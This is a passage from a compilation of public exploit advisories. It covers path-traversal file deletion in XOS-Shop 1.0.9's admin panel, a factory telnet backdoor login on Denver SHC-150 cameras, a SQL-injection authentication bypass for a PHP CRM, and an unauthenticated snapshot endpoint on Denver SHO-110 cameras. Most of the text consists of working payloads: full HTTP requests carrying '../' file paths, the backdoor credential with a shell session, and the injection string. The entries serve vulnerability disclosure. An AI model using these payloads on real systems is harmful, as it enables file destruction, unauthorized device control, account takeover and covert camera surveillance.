manufacturer 3. Upload any image as "Manufacturers Image" and click the Save button 4. Then tick the "Delete" checkbox and click the Save button 5. Intercept the request and replace the existing image name with any file on the server via the parameter "current_manufacturer_image". 
# Assumed there is a backup.conf file in web root PoC #1) param current_manufacturer_image - Deleting backup.conf file in web root Request: ======== POST /xos_shop_v1.0.9/shop/admin/manufacturers.php?page=1&mID=10&action=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------120849309142309531191692203678 Content-Length: 1305 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/xos_shop_v1.0.9/shop/admin/manufacturers.php?page=1&mID=10&action=edit Cookie: XOSsidAdmin=os13rkgs85m47iak7l8ck2j1ja Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Sec-GPC: 1 -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_name[2]" App -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_name[1]" App -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_name[3]" App -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_url[2]" app.com -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_url[1]" app.com -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_url[3]" app.com -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="delete_manufacturer_image" true -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="current_manufacturer_image" ../../backup.conf 
-----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_image"; filename="" Content-Type: application/octet-stream -----------------------------120849309142309531191692203678-- --- ########## # PoC 2 # ########## Vulnerable URL: http://localhost/xos_shop_v1.0.9/shop/admin/categories.php Vulnerable Code: line 154-156, 167-169, 421-425, 433-437 - xos_shop_v1.0.9\shop\admin\categories.php Note: Multiple parameters affected Steps to Reproduce: 1. Login as admin 2. Goto Catalog > Categories/Products > edit any category 3. Upload any image as "Category Image" if there is no existing image and click save button else, 4. Tick "Delete" checkbox and click save button 5. Intercept the request and replace existing image name to any files on the server via parameter "current_category_image". # Assumed there is a backup.conf file in web root PoC #2) param current_category_image - Deleting backup.conf file in web root Request: ======== POST /xos_shop_v1.0.9/shop/admin/categories.php?action=update_category&cPath=&cpID=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------95672159210084798032704634599 Content-Length: 2524 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/xos_shop_v1.0.9/shop/admin/categories.php?cPath=&cpID=1&action=new_category Cookie: XOSsidAdmin=os13rkgs85m47iak7l8ck2j1ja Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Sec-GPC: 1 -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_id" 1 -----------------------------95672159210084798032704634599 Content-Disposition: 
form-data; name="current_category_image" ../../../backup.conf -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="category_name" Hardware -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="current_categories_or_pages_status" 1 -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="delete_category_image" true -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_image"; filename="" Content-Type: application/octet-stream -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="product_list_b" 0 -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="sort_order" 10 -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_status" 1 -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_name[2]" Hardware -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_name[1]" Hardware -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_name[3]" Hardware -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_heading_title[2]" -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_heading_title[1]" -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_heading_title[3]" -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_content[2]" -----------------------------95672159210084798032704634599 Content-Disposition: form-data; 
name="categories_or_pages_content[1]" -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_content[3]" -----------------------------95672159210084798032704634599-- --- # For more explanation, you can refer to the github issue on XOS-Shop via https://github.com/XOS-Shop/xos_shop_system/issues/1 # The affected version is prior to v1.0.9.
# Exploit Title: Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution (RCE) # Date: 27 July 2021 # Exploit Author: Ivan Nikolsky (enty8080) # Vendor Homepage: https://denver.eu/products/smart-home-security/denver-shc-150/c-1024/c-1243/p-3824 # Version: Denver SHC-150 (all firmware versions) # Tested on: Denver SHC-150 A backdoor was found in the Denver SHC-150 Smart Wifi Camera; other models may have it as well. The backdoor is a factory telnet credential, `default`. Simply open a telnet connection to the camera on port 23 and enter `default` at the login prompt (yes, on these cameras the telnet service is served on port 23). After this, you get a Linux shell. The backdoor allows an attacker to execute commands at the OS level through telnet. PoC: ``` enty8080@Ivans-Air ~ % telnet 192.168.2.118 23 Trying 192.168.2.118... Connected to pc192-168-2-118. Escape character is '^]'. goke login: default $ ls / bin home linuxrc opt run tmp dev init media proc sbin usr etc lib mnt root sys var $ pwd /home/default $ exit Connection closed by foreign host. enty8080@Ivans-Air ~ % ```
# Exploit Title: Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass # Date: 27/07/2021 # Exploit Author: Shafique_Wasta # Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/crm_0.zip # Version: 1 # Tested on: Windows 10/xampp # DESCRIPTION # # Customer Relationship Management System is vulnerable to a SQL injection authentication bypass # Exploit Working: # 1. Visit http://localhost/crm/customer/login.php # 2. You will see the login panel # 3. Enter this payload ( '=' 'or' ) in the username field and click Sign In; you will be logged in to the admin account. # Vulnerable URL :http://localhost/crm/customer/login.php # Payload: '=' 'or'

Denver IP Camera SHO-110 - Unauthenticated Snapshot

# Exploit Title: Denver IP Camera SHO-110 - Unauthenticated Snapshot # Date: 28 July 2021 # Exploit Author: Ivan Nikolsky (enty8080) # Vendor Homepage: https://denver.eu/products/smart-home-security/denver-sho-110/c-1024/c-1243/p-3826 # Version: Denver SHO-110 (all firmware versions) # Tested on: Denver SHO-110 A backdoor was found in the Denver SHO-110 IP Camera; other models may have it as well. The backdoor is located in the camera's second HTTP service and allows an attacker to retrieve a snapshot through the `/snapshot` endpoint. The camera runs two HTTP services: the first is served on port 80 and requires authentication; the second is served on port 8001 and does not require authentication. It is possible to write a script that collects snapshots and stitches them together, so an attacker would be able to reconstruct the camera stream. PoC: http://<host>:8001/snapshot